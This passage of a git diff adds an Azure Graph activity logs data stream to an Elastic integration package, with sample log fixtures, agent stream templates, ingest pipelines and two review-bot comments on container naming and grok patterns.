Activity\",\"operationVersion\":\"beta\",\"properties\":{\"apiVersion\":\"beta\",\"appId\":\"a5a68e32-269a-3c91-a5e2-b9254e67hb29\",\"atContent\":\"\",\"clientAuthMethod\":\"0\",\"clientRequestId\":\"2fe56789-a848-4c93-9d2d-5675972ardk9\",\"durationMs\":846544,\"identityProvider\":null,\"ipAddress\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\",\"location\":\"UK South\",\"operationId\":\"f7749da0-e6g1-4f3f-975a-64937fbge347\",\"requestId\":\"f7749da0-e6g1-4f3f-975a-64937fbge347\",\"requestMethod\":\"GET\",\"requestUri\":\"https://graph.microsoft.com/beta/devices?$select=displayName,id,deviceId\\\\u0026$search=%22displayName:a%22\\\\u0026$top=30\",\"responseSizeBytes\":0,\"responseStatusCode\":200,\"roles\":null,\"scopes\":\"AccessReview.ReadWrite.All AuditLog.Read.All ChangeManagement.Read.All ConsentRequest.Create ConsentRequest.Read ConsentRequest.ReadApprove.All ConsentRequest.ReadWrite.All CustomSecAttributeAuditLogs.Read.All Directory.AccessAsUser.All Directory.Read.All Directory.ReadWrite.All Directory.Write.Restricted DirectoryRecommendations.Read.All DirectoryRecommendations.ReadWrite.All email EntitlementManagement.Read.All Group.ReadWrite.All IdentityProvider.ReadWrite.All IdentityRiskEvent.ReadWrite.All IdentityRiskyServicePrincipal.ReadWrite.All IdentityRiskyUser.ReadWrite.All IdentityUserFlow.Read.All LifecycleWorkflows.ReadWrite.All openid Policy.Read.All Policy.Read.IdentityProtection Policy.ReadWrite.AuthenticationFlows Policy.ReadWrite.AuthenticationMethod Policy.ReadWrite.ConditionalAccess Policy.ReadWrite.ExternalIdentities Policy.ReadWrite.IdentityProtection Policy.ReadWrite.MobilityManagement profile Reports.Read.All RoleManagement.ReadWrite.Directory RoleManagement.ReadWrite.Exchange SecurityEvents.ReadWrite.All TrustFrameworkKeySet.Read.All User.Export.All User.ReadWrite.All 
UserAuthenticationMethod.ReadWrite.All\",\"servicePrincipalId\":null,\"signInActivityId\":\"signin_Activity-Id\",\"tenantId\":\"ab47545b-420e-46fg-c4dc-8f7697k1aadb\",\"timeGenerated\":\"2024-03-07T16:42:12.0485843Z\",\"tokenIssuedAt\":\"2024-03-07T16:36:51Z\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0\",\"userId\":\"285e0849-a706-4a9a-9eb1-f4e21cc78793\",\"wids\":\"a207b4d3-0g8d-90cb-bhj5-d80n3122e67 a207b4d3-0g8d-90cb-bhj5-d80n3122e69 a207b4d3-0g8d-90cb-bhj5-d80n3122e89\"},\"resourceId\":\"/TENANTS/AB47545B-420E-46FG-C4DC-8F7697K1AADB/PROVIDERS/MICROSOFT.AADIAM\",\"resultSignature\":\"200\",\"tenantId\":\"ab47545b-420e-46fg-c4dc-8f7697k1aadb\",\"time\":\"2024-03-07T16:42:12.0485843Z\"}", + "type": [ + "access" + ] + }, + "http": { + "request": { + "id": "f7749da0-e6g1-4f3f-975a-64937fbge347", + "method": "GET" + }, + "response": { + "bytes": 0, + "status_code": 200 + } + }, + "log": { + "level": "4" + }, + "related": { + "ip": [ + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" + ], + "user": [ + "285e0849-a706-4a9a-9eb1-f4e21cc78793" + ] + }, + "source": { + "geo": { + "continent_name": "Europe", + "country_iso_code": "NO", + "country_name": "Norway", + "location": { + "lat": 62.0, + "lon": 10.0 + } + }, + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" + }, + "tags": [ + "preserve_original_event" + ], + "url": { + "domain": "graph.microsoft.com", + "original": "https://graph.microsoft.com/beta/devices?$select=displayName,id,deviceId\\u0026$search=%22displayName:a%22\\u0026$top=30", + "path": "/beta/devices", + "query": "$select=displayName,id,deviceId\\u0026$search=%22displayName:a%22\\u0026$top=30", + "scheme": "https" + }, + "user": { + "id": "285e0849-a706-4a9a-9eb1-f4e21cc78793" + }, + "user_agent": { + "device": { + "name": "Other" + }, + "name": "Edge", + "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 
Safari/537.36 Edg/122.0.0.0", + "os": { + "full": "Windows 10", + "name": "Windows", + "version": "10" + }, + "version": "122.0.0.0" + } + }, + { + "@timestamp": "2024-03-07T10:24:44.793Z", + "azure": { + "correlation_id": "f7839da0-e7d1-4e4f-985a-64937fbge347", + "graphactivitylogs": { + "category": "MicrosoftGraphActivityLogs", + "operation_name": "Microsoft Graph Activity", + "operation_version": "v1.0", + "properties": { + "api_version": "v1.0", + "app_id": "a5a68e32-269a-3c91-a5e2-b9254e67hb29", + "client_auth_method": 2, + "client_request_id": "2fe58790-a848-4a93-9d2c-5645972aejk9", + "identity_provider": "https://sts.windows.net/ab30785b-417f-42a4-b5dc-8f9051718acb/", + "operation_id": "f7839da0-e7d1-4e4f-985a-64937fbge347", + "roles": [ + "Application.Read.All", + "Domain.Read.All", + "GroupMember.Read.All", + "LicenseAssignment.ReadWrite.All", + "Organization.Read.All", + "Policy.Read.ConditionalAccess", + "RoleManagement.Read.Directory", + "Team.ReadBasic.All", + "TeamsTab.Create", + "TeamsTab.Read.All", + "TeamsTab.ReadWrite.All", + "User.Read.All" + ], + "service_principal_id": "f2aq4c71-31e3-5065-91g3-4b2dfbsv50fg", + "sign_in_activity_id": "sign-in_ActivityId", + "time_generated": "2024-03-07T10:24:44.793Z", + "token_issued_at": "2024-03-07T10:19:44.000Z", + "wids": [ + "a207b4d3-0g8d-90cb-bhj5-d80n3121e69" + ] + }, + "result_signature": "200" + }, + "resource": { + "id": "/TENANTS/AB30785B-417F-42A4-B5DC-8F9051718ACB/PROVIDERS/MICROSOFT.AADIAM", + "provider": "MICROSOFT.AADIAM" + }, + "tenant_id": "ab30785b-417f-42a4-b5dc-8f9051718acb" + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.143" + }, + "cloud": { + "account": { + "id": "ab30785b-417f-42a4-b5dc-8f9051718acb" + }, + "provider": "azure", + "region": "France 
Central", + "service": { + "name": "Microsoft Graph" + } + }, + "destination": { + "geo": { + "region_name": "France Central" + } + }, + "ecs": { + "version": "8.0.0" + }, + "event": { + "action": "Microsoft Graph Activity", + "duration": 1213372224, + "kind": "event", + "original": "{\"Level\":4,\"callerIpAddress\":\"81.2.69.143\",\"category\":\"MicrosoftGraphActivityLogs\",\"correlationId\":\"f7839da0-e7d1-4e4f-985a-64937fbge347\",\"durationMs\":1100725,\"location\":\"France Central\",\"operationName\":\"Microsoft Graph Activity\",\"operationVersion\":\"v1.0\",\"properties\":{\"apiVersion\":\"v1.0\",\"appId\":\"a5a68e32-269a-3c91-a5e2-b9254e67hb29\",\"atContent\":\"\",\"clientAuthMethod\":\"2\",\"clientRequestId\":\"2fe58790-a848-4a93-9d2c-5645972aejk9\",\"durationMs\":1100725,\"identityProvider\":\"https://sts.windows.net/ab30785b-417f-42a4-b5dc-8f9051718acb/\",\"ipAddress\":\"81.2.69.143\",\"location\":\"France Central\",\"operationId\":\"f7839da0-e7d1-4e4f-985a-64937fbge347\",\"requestId\":\"f7839da0-e7d1-4e4f-985a-64937fbge347\",\"requestMethod\":\"GET\",\"requestUri\":\"https://graph.microsoft.com/v1.0/directoryRoles\",\"responseSizeBytes\":4300,\"responseStatusCode\":200,\"roles\":\"Application.Read.All Domain.Read.All GroupMember.Read.All LicenseAssignment.ReadWrite.All Organization.Read.All Policy.Read.ConditionalAccess RoleManagement.Read.Directory Team.ReadBasic.All TeamsTab.Create TeamsTab.Read.All TeamsTab.ReadWrite.All 
User.Read.All\",\"scopes\":null,\"servicePrincipalId\":\"f2aq4c71-31e3-5065-91g3-4b2dfbsv50fg\",\"signInActivityId\":\"sign-in_ActivityId\",\"tenantId\":\"ab30785b-417f-42a4-b5dc-8f9051718acb\",\"timeGenerated\":\"2024-03-07T10:24:44.7939418Z\",\"tokenIssuedAt\":\"2024-03-07T10:19:44Z\",\"userAgent\":\"\",\"userId\":null,\"wids\":\"a207b4d3-0g8d-90cb-bhj5-d80n3121e69\"},\"resourceId\":\"/TENANTS/AB30785B-417F-42A4-B5DC-8F9051718ACB/PROVIDERS/MICROSOFT.AADIAM\",\"resultSignature\":\"200\",\"tenantId\":\"ab30785b-417f-42a4-b5dc-8f9051718acb\",\"time\":\"2024-03-07T10:24:44.7939418Z\"}", + "type": [ + "access" + ] + }, + "http": { + "request": { + "id": "f7839da0-e7d1-4e4f-985a-64937fbge347", + "method": "GET" + }, + "response": { + "bytes": 4300, + "status_code": 200 + } + }, + "log": { + "level": "4" + }, + "related": { + "ip": [ + "81.2.69.143" + ] + }, + "source": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.143" + }, + "tags": [ + "preserve_original_event" + ], + "url": { + "domain": "graph.microsoft.com", + "extension": "0/directoryRoles", + "original": "https://graph.microsoft.com/v1.0/directoryRoles", + "path": "/v1.0/directoryRoles", + "scheme": "https" + } + } + ] +} \ No newline at end of file diff --git a/packages/azure/data_stream/graphactivitylogs/_dev/test/pipeline/test-common-config.yml b/packages/azure/data_stream/graphactivitylogs/_dev/test/pipeline/test-common-config.yml new file mode 100644 index 00000000000..4da22641654 --- /dev/null +++ b/packages/azure/data_stream/graphactivitylogs/_dev/test/pipeline/test-common-config.yml @@ -0,0 +1,3 @@ +fields: + tags: + - preserve_original_event 
diff --git a/packages/azure/data_stream/graphactivitylogs/agent/stream/azure-eventhub.yml.hbs b/packages/azure/data_stream/graphactivitylogs/agent/stream/azure-eventhub.yml.hbs
new file mode 100644
index 00000000000..c49f35bb0b4
--- /dev/null
+++ b/packages/azure/data_stream/graphactivitylogs/agent/stream/azure-eventhub.yml.hbs
@@ -0,0 +1,46 @@
+{{#if connection_string}}
+connection_string: {{connection_string}}
+{{/if}}
+{{#if storage_account_container}}
+storage_account_container: {{storage_account_container}}
+{{else}}
+{{#if eventhub}}
+storage_account_container: filebeat-graphactivitylogs-{{eventhub}}
+{{/if}}
+{{/if}}
+{{#if eventhub}}
+eventhub: {{eventhub}}
+{{/if}}
+{{#if consumer_group}}
+consumer_group: {{consumer_group}}
+{{/if}}
+{{#if storage_account}}
+storage_account: {{storage_account}}
+{{/if}}
+{{#if storage_account_key}}
+storage_account_key: {{storage_account_key}}
+{{/if}}
+{{#if resource_manager_endpoint}}
+resource_manager_endpoint: {{resource_manager_endpoint}}
+{{/if}}
+tags:
+{{#if preserve_original_event}}
+ - preserve_original_event
+{{/if}}
+{{#each tags as |tag|}}
+ - {{tag}}
+{{/each}}
+{{#contains "forwarded" tags}}
+publisher_pipeline.disable_host: true
+{{/contains}}
+{{#if processors}}
+processors:
+{{processors}}
+{{/if}}
+sanitize_options:
+{{#if sanitize_newlines}}
+ - NEW_LINES
+{{/if}}
+{{#if sanitize_singlequotes}}
+ - SINGLE_QUOTES
+{{/if}}
diff --git a/packages/azure/data_stream/graphactivitylogs/agent/stream/log.yml.hbs b/packages/azure/data_stream/graphactivitylogs/agent/stream/log.yml.hbs
new file mode 100644
index 00000000000..f7c4bb1e4d7
--- /dev/null
+++ b/packages/azure/data_stream/graphactivitylogs/agent/stream/log.yml.hbs
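Review bot: The fallback `storage_account_container: filebeat-graphactivitylogs-{{eventhub}}` derives a blob container name from the Event Hub name without normalising it; Azure blob container names are limited to lowercase letters, digits and hyphens (3–63 characters), while Event Hub names may contain uppercase letters, periods and underscores, so such an Event Hub name would produce an invalid container name at runtime and the input would fail to start. The same template shape appears to be shared with the other azure data streams, so this is likely inherited rather than introduced here. A handlebars comment above the `{{else}}` branch, e.g. `{{!-- derived container name must satisfy Azure blob container naming rules (lowercase, digits, hyphens, 3-63 chars) --}}`, would at least document the constraint for operators who rely on the default.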
@@ -0,0 +1,19 @@
+paths:
+ {{#each paths as |path|}}
+- {{path}}
+ {{/each}}
+exclude_files: [".gz$"]
+tags:
+{{#if preserve_original_event}}
+ - preserve_original_event
+{{/if}}
+{{#each tags as |tag|}}
+ - {{tag}}
+{{/each}}
+{{#contains "forwarded" tags}}
+publisher_pipeline.disable_host: true
+{{/contains}}
+{{#if processors}}
+processors:
+{{processors}}
+{{/if}}
diff --git a/packages/azure/data_stream/graphactivitylogs/elasticsearch/ingest_pipeline/azure-shared-pipeline.yml b/packages/azure/data_stream/graphactivitylogs/elasticsearch/ingest_pipeline/azure-shared-pipeline.yml
new file mode 100644
index 00000000000..5dceb3d325b
--- /dev/null
+++ b/packages/azure/data_stream/graphactivitylogs/elasticsearch/ingest_pipeline/azure-shared-pipeline.yml
@@ -0,0 +1,91 @@ +--- +description: Pipeline for parsing Azure shared log fields. +processors: + - set: + field: cloud.provider + value: azure + - grok: + field: azure.resource_id + patterns: + - /SUBSCRIPTIONS/%{SUBID:azure.subscription_id}/RESOURCEGROUPS/%{GROUPID:azure.resource.group}/PROVIDERS/%{PROVIDERNAME:azure.resource.provider}/NAMESPACES/%{NAMESPACE:azure.resource.namespace}/AUTHORIZATIONRULES/%{RULE:azure.resource.authorization_rule} + - /subscriptions/%{SUBID:azure.subscription_id}/resourceGroups/%{GROUPID:azure.resource.group}/providers/%{PROVIDERNAME:azure.resource.provider}/namespaces/%{NAMESPACE:azure.resource.namespace}/authorizationRules/%{RULE:azure.resource.authorization_rule} + pattern_definitions: + SUBID: (\{){0,1}[0-9a-fA-F]{8}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{12}(\}){0,1} + GROUPID: .+ + PROVIDERNAME: .+ + NAMESPACE: .+ + RULE: .+ + ignore_failure: true + - grok: + field: azure.resource_id + if: 'ctx.azure?.subscription_id == null' + patterns: + - /SUBSCRIPTIONS/%{SUBID:azure.subscription_id}/RESOURCEGROUPS/%{GROUPID:azure.resource.group}/PROVIDERS/%{PROVIDERNAME:azure.resource.provider}/%{NAME:azure.resource.name} + - /subscriptions/%{SUBID:azure.subscription_id}/resourceGroups/%{GROUPID:azure.resource.group}/providers/%{PROVIDERNAME:azure.resource.provider}/%{NAME:azure.resource.name} + pattern_definitions: + SUBID: (\{){0,1}[0-9a-fA-F]{8}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{12}(\}){0,1} + GROUPID: .+ + PROVIDERNAME: ([A-Za-z])\w+.([A-Za-z])\w+/([A-Za-z])\w+. 
+ NAME: ((?!AUTHORIZATIONRULES).)*$ + ignore_failure: true + - grok: + field: azure.resource_id + if: 'ctx.azure?.subscription_id == null' + patterns: + - /SUBSCRIPTIONS/%{SUBID:azure.subscription_id}/RESOURCEGROUPS/%{GROUPID:azure.resource.group}/PROVIDERS/%{PROVIDERNAME:azure.resource.provider}/%{NAME:azure.resource.name} + - /subscriptions/%{SUBID:azure.subscription_id}/resourceGroups/%{GROUPID:azure.resource.group}/providers/%{PROVIDERNAME:azure.resource.provider}/%{NAME:azure.resource.name} + pattern_definitions: + SUBID: (\{){0,1}[0-9a-fA-F]{8}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{12}(\}){0,1} + GROUPID: .+ + PROVIDERNAME: ([A-Za-z])\w+.([A-Za-z])\w+\/([A-Za-z][^\/])\w+ + NAME: .+ + ignore_failure: true + - grok: + field: azure.resource_id + if: 'ctx.azure?.subscription_id == null' + patterns: + - /providers/%{PROVIDER:azure.resource.provider} + - /PROVIDERS/%{PROVIDER:azure.resource.provider} + pattern_definitions: + PROVIDER: .+ + ignore_failure: true + - grok: + field: azure.resource_id + if: 'ctx.azure?.subscription_id == null' + patterns: + - /SUBSCRIPTIONS/%{SUBID:azure.subscription_id}/PROVIDERS/%{PROVIDERNAME:azure.resource.provider} + - /subscriptions/%{SUBID:azure.subscription_id}/providers/%{PROVIDERNAME:azure.resource.provider} + pattern_definitions: + SUBID: (\{){0,1}[0-9a-fA-F]{8}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{12}(\}){0,1} + PROVIDERNAME: ([A-Za-z])\w+.([A-Za-z])\w+\/([A-Za-z][^\/])\w+ + ignore_failure: true + - grok: + field: azure.resource_id + if: 'ctx.azure?.subscription_id == null' + patterns: + - /SUBSCRIPTIONS/%{SUBID:azure.subscription_id}/RESOURCEGROUPS/%{GROUPID:azure.resource.group} + - /subscriptions/%{SUBID:azure.subscription_id}/resourceGroups/%{GROUPID:azure.resource.group} + pattern_definitions: + SUBID: (\{){0,1}[0-9a-fA-F]{8}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{12}(\}){0,1} + GROUPID: .+ + ignore_failure: true + - grok: + field: azure.resource_id + 
if: 'ctx.azure?.subscription_id == null' + patterns: + - /SUBSCRIPTIONS/%{SUBID:azure.subscription_id} + - /subscriptions/%{SUBID:azure.subscription_id} + pattern_definitions: + SUBID: (\{){0,1}[0-9a-fA-F]{8}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{12}(\}){0,1} + ignore_failure: true + - rename: + field: azure.resource_id + target_field: azure.resource.id + ignore_missing: true + - lowercase: + field: event.outcome + ignore_missing: true +on_failure: + - set: + field: error.message + value: '{{ _ingest.on_failure_message }}' diff --git a/packages/azure/data_stream/graphactivitylogs/elasticsearch/ingest_pipeline/default.yml b/packages/azure/data_stream/graphactivitylogs/elasticsearch/ingest_pipeline/default.yml new file mode 100644 index 00000000000..7cbacb283df --- /dev/null +++ b/packages/azure/data_stream/graphactivitylogs/elasticsearch/ingest_pipeline/default.yml 
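Review bot: The second grok processor's `PROVIDERNAME` definition, `([A-Za-z])\w+.([A-Za-z])\w+/([A-Za-z])\w+.`, uses an unescaped `.` (matching any character) and a trailing `.` where the third and fifth groks write `\/` and `[^\/]`, so its intent is unclear and it is inconsistent with its siblings; it looks copied from the shared pipeline of the other azure data streams, so the fix probably belongs there too. For this data stream the resource id has the `/TENANTS/<tenant>/PROVIDERS/<provider>` shape (see the expected-output fixture earlier in the diff), which only the `/PROVIDERS/%{PROVIDER:azure.resource.provider}` grok matches, and because every grok carries `ignore_failure: true` an id matching none of them silently yields no subscription, group or provider fields without any entry in `error.message`. A `description:` on the first grok, e.g. `description: First of a cascade of grok attempts on azure.resource_id; each later grok runs only while azure.subscription_id is still unset.`, would make the fall-through design explicit to the next maintainer.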
@@ -0,0 +1,466 @@ +--- +description: Pipeline for parsing azure graph activity logs. +processors: + - set: + field: ecs.version + value: '8.0.0' + tag: set-ecs_version + - set: + field: event.kind + value: event + tag: set-event_kind + - append: + field: event.type + value: access + tag: append-event_type + - rename: + field: azure + target_field: azure-eventhub + ignore_missing: true + tag: rename-azure + - rename: + field: message + target_field: event.original + ignore_missing: true + if: 'ctx.event?.original == null' + tag: rename-message + description: 'Renames the original `message` field to `event.original` to store a copy of the original message. The `event.original` field is not touched if the document already has one; it may happen when Logstash sends the document.' + - remove: + field: message + ignore_missing: true + if: 'ctx.event?.original != null' + description: 'The `message` field is no longer required if the document has an `event.original` field.' + tag: remove-message + - json: + field: event.original + target_field: azure.graphactivitylogs + tag: json-event_original + - script: + description: Convert Azure JSON keys to snake case. 
+ tag: azure-json-keys-to-snake-case + lang: painless + source: | + Map keysToSnakeCase(Map m) { + def regex = /_?([a-z])([A-Z]+)/; + def out = [:]; + + for (entry in m.entrySet()) { + def k = entry.getKey(); + def v = entry.getValue(); + + if (v instanceof Map) { + v = keysToSnakeCase(v); + } else if (v instanceof List) { + for (int i = 0; i < v.size(); i++) { + def item = v.get(i); + if (item instanceof Map) { + v.set(i, keysToSnakeCase(item)); + } + } + } + + k = regex.matcher(k).replaceAll('$1_$2').toLowerCase(); + out.put(k, v); + } + + return out; + } + + ctx.azure['graphactivitylogs'] = keysToSnakeCase(ctx.azure.graphactivitylogs); + - date: + field: azure.graphactivitylogs.time + target_field: '@timestamp' + if: ctx.azure?.graphactivitylogs?.time != null + tag: date-time + formats: + - ISO8601 + - remove: + field: azure.graphactivitylogs.time + ignore_missing: true + tag: remove-time + - date: + field: azure.graphactivitylogs.properties.token_issued_at + target_field: azure.graphactivitylogs.properties.token_issued_at + if: ctx.azure?.graphactivitylogs?.properties?.token_issued_at != null + tag: date-token_issued_at + formats: + - ISO8601 + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: azure.graphactivitylogs.resource_id + target_field: azure.resource_id + ignore_missing: true + tag: rename-resource_id + - convert: + field: azure.graphactivitylogs.caller_ip_address + target_field: source.ip + type: ip + ignore_missing: true + tag: convert-caller_ip_address + on_failure: + - rename: + field: azure.graphactivitylogs.caller_ip_address + target_field: source.address + ignore_missing: true + tag: rename-caller_ip_address + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with 
tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: azure.graphactivitylogs.properties.ip_address + target_field: source.ip + type: ip + ignore_missing: true + tag: convert-properties_ip_address + if: ctx.source?.ip == null + on_failure: + - rename: + field: azure.graphactivitylogs.properties.ip_address + target_field: source.address + ignore_missing: true + tag: rename-properties_ip_address + if: ctx.source?.address == null + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + + - remove: + field: + - azure.graphactivitylogs.caller_ip_address + - azure.graphactivitylogs.properties.ip_address + if: 'ctx.source?.ip != null' + tag: remove-caller_ip_address + ignore_missing: true + - set: + field: client.ip + value: '{{source.ip}}' + tag: set-client_ip + ignore_empty_value: true + - append: + field: related.ip + tag: append-related_ip + value: '{{source.ip}}' + allow_duplicates: false + if: 'ctx.source?.ip != null' + - convert: + field: azure.graphactivitylogs.level + target_field: log.level + type: string + tag: convert-level + ignore_missing: true + - remove: + field: azure.graphactivitylogs.level + ignore_missing: true + tag: remove-level + - rename: + field: azure.graphactivitylogs.duration_ms + target_field: event.duration + if: ctx.azure?.graphactivitylogs?.duration_ms != null + tag: rename-duration_ms + - rename: + field: azure.graphactivitylogs.properties.duration_ms + target_field: event.duration + if: ctx.azure?.graphactivitylogs?.properties?.durationMs != null && ctx.event?.duration == null + tag: rename-properties-durationMs + - script: + lang: painless + source: | + if (ctx.event.duration!= null) { + ctx.event.duration = ctx.event.duration * 
1000000; + } + ignore_failure: true + tag: script-duration + - remove: + field: + - azure.graphactivitylogs.duration_ms + - azure.graphactivitylogs.properties.duration_ms + tag: remove-duration_ms + if: ctx.event?.duration != null + ignore_missing: true + - rename: + field: azure.graphactivitylogs.location + target_field: destination.geo.region_name + ignore_missing: true + tag: rename-location + - rename: + field: azure.graphactivitylogs.properties.location + target_field: destination.geo.region_name + if: ctx.destination?.geo?.region_name == null && ctx.azure?.graphactivitylogs?.properties?.location != null + tag: rename-properties-location + - remove: + field: + - azure.graphactivitylogs.location + - azure.graphactivitylogs.properties.location + tag: remove-location + if: ctx.destination?.geo?.region_name != null + ignore_missing: true + - convert: + field: azure.graphactivitylogs.operation_name + target_field: event.action + type: string + ignore_missing: true + tag: convert-operation_name + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: azure.graphactivitylogs.tenant_id + target_field: azure.tenant_id + ignore_missing: true + tag: rename-tenant_id + - rename: + field: azure.graphactivitylogs.properties.tenant_id + target_field: azure.tenant_id + ignore_missing: true + if: ctx.azure?.tenant_id == null + tag: rename-properties_tenant_id + - remove: + field: + - azure.graphactivitylogs.tenant_id + - azure.graphactivitylogs.properties.tenant_id + tag: remove-tenant_id + if: ctx.azure?.tenant_id != null + ignore_missing: true + - rename: + field: azure.graphactivitylogs.correlation_id + target_field: azure.correlation_id + ignore_missing: true + tag: rename-correlation_id + - rename: + field: azure.graphactivitylogs.properties.request_id + 
target_field: http.request.id + ignore_missing: true + tag: rename-properties_request_id + - rename: + field: azure.graphactivitylogs.properties.request_method + target_field: http.request.method + ignore_missing: true + tag: rename-properties_request_methods + - uri_parts: + field: azure.graphactivitylogs.properties.request_uri + if: ctx.azure?.graphactivitylogs?.properties?.request_uri != null + keep_original: true + tag: uri_parts-properties-request_uri + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - remove: + field: azure.graphactivitylogs.properties.request_uri + tag: remove-properties_request_uri + if: ctx.url?.original != null + ignore_missing: true + - rename: + field: azure.graphactivitylogs.properties.response_size_bytes + target_field: http.response.bytes + ignore_missing: true + tag: rename-properties_response_bytes + - rename: + field: azure.graphactivitylogs.properties.response_status_code + target_field: http.response.status_code + ignore_missing: true + tag: rename-properties_response_statuscode + - split: + field: azure.graphactivitylogs.properties.roles + if: ctx.azure?.graphactivitylogs?.properties?.roles != null && ctx.azure.graphactivitylogs.properties.roles != '' + separator: ' ' + tag: split-properties_roles + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - split: + field: azure.graphactivitylogs.properties.scopes + if: ctx.azure?.graphactivitylogs?.properties?.scopes != null && ctx.azure.graphactivitylogs.properties.scopes != '' + separator: ' ' + tag: split-properties_scopes + on_failure: + - append: + field: error.message 
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - split: + field: azure.graphactivitylogs.properties.wids + if: ctx.azure?.graphactivitylogs?.properties?.wids != null && ctx.azure.graphactivitylogs.properties.wids != '' + separator: ' ' + tag: split-properties_wids + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - user_agent: + field: azure.graphactivitylogs.properties.user_agent + if: ctx.azure?.graphactivitylogs?.properties?.user_agent != null && ctx.azure.graphactivitylogs.properties.user_agent != '' + tag: user_agent-properties_user_agent + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - remove: + field: azure.graphactivitylogs.properties.user_agent + tag: remove-properties_user_agent + if: ctx.user_agent != null + ignore_missing: true + - rename: + field: azure.graphactivitylogs.properties.user_id + target_field: user.id + tag: rename-properties_user_id + if: ctx.azure?.graphactivitylogs?.properties?.user_id != null && ctx.azure.graphactivitylogs.properties.user_id != '' + - set: + field: client.user.id + value: '{{user.id}}' + tag: set-client_ip + ignore_empty_value: true + - append: + field: related.user + value: '{{user.id}}' + tag: append-related_user + allow_duplicates: false + if: 'ctx.user?.id != null' + - rename: + field: azure.graphactivitylogs.properties._billed_size + target_field: azure.graphactivitylogs.properties.billed_size + if: 
ctx.azure?.graphactivitylogs?.properties?._billed_size != null + tag: rename-properties_billed_size + - rename: + field: azure.graphactivitylogs.properties._is_billable + target_field: azure.graphactivitylogs.properties.is_billable + if: ctx.azure?.graphactivitylogs?.properties?._is_billable != null + tag: rename-properties_is_billable + - convert: + field: azure.graphactivitylogs.properties.is_billable + type: boolean + tag: convert-properties_is_billable + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: azure.graphactivitylogs.properties.client_auth_method + type: integer + tag: convert-properties_client_auth_method + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + field: azure.graphactivitylogs.properties.time_generated + target_field: azure.graphactivitylogs.properties.time_generated + if: ctx.azure?.graphactivitylogs?.properties?.time_generated != null + tag: date-properties_time_generated + formats: + - ISO8601 + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - pipeline: + name: '{{ IngestPipeline "azure-shared-pipeline" }}' + tag: pipeline-azure-shared-pipeline + - fingerprint: + fields: + - 